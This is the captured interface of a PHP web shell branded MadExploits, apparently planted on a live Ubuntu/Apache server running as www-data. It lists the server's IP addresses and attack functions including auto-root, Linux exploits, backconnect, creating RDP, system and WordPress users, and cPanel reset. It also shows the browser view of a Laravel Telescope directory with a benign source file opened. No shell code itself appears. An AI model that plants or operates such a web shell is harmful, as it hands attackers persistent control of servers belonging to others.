Linux 5474007-topit 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Apache/2.4.52 (Ubuntu)
: 85.198.82.39 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
8.3.30
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
back /
vendor /
laravel /
telescope /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Actions
[ DIR ]
drwxr-xr-x
Console
[ DIR ]
drwxr-xr-x
Contracts
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Jobs
[ DIR ]
drwxr-xr-x
Storage
[ DIR ]
drwxr-xr-x
Watchers
[ DIR ]
drwxr-xr-x
AuthorizesRequests.php
817
B
-rw-r--r--
Avatar.php
1.2
KB
-rw-r--r--
EntryResult.php
2.8
KB
-rw-r--r--
EntryType.php
713
B
-rw-r--r--
EntryUpdate.php
1.91
KB
-rw-r--r--
ExceptionContext.php
1.25
KB
-rw-r--r--
ExtractProperties.php
1.51
KB
-rw-r--r--
ExtractTags.php
4.88
KB
-rw-r--r--
ExtractsMailableTags.php
856
B
-rw-r--r--
FormatModel.php
842
B
-rw-r--r--
IncomingDumpEntry.php
1.45
KB
-rw-r--r--
IncomingEntry.php
6.78
KB
-rw-r--r--
IncomingExceptionEntry.php
1.27
KB
-rw-r--r--
ListensForStorageOpportunities...
3.36
KB
-rw-r--r--
RegistersWatchers.php
1.16
KB
-rw-r--r--
Telescope.php
21.31
KB
-rw-r--r--
TelescopeApplicationServicePro...
1.16
KB
-rw-r--r--
TelescopeServiceProvider.php
4.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ExceptionContext.php
<?php namespace Laravel\Telescope; use Illuminate\Support\Str; use Throwable; class ExceptionContext { /** * Get the exception code context for the given exception. * * @param \Throwable $exception * @return array */ public static function get(Throwable $exception) { return static::getEvalContext($exception) ?? static::getFileContext($exception); } /** * Get the exception code context when eval() failed. * * @param \Throwable $exception * @return array|null */ protected static function getEvalContext(Throwable $exception) { if (Str::contains($exception->getFile(), "eval()'d code")) { return [ $exception->getLine() => "eval()'d code", ]; } } /** * Get the exception code context from a file. * * @param \Throwable $exception * @return array */ protected static function getFileContext(Throwable $exception) { return collect(explode("\n", file_get_contents($exception->getFile()))) ->slice($exception->getLine() - 10, 20) ->mapWithKeys(function ($value, $key) { return [$key + 1 => $value]; })->all(); } }
Close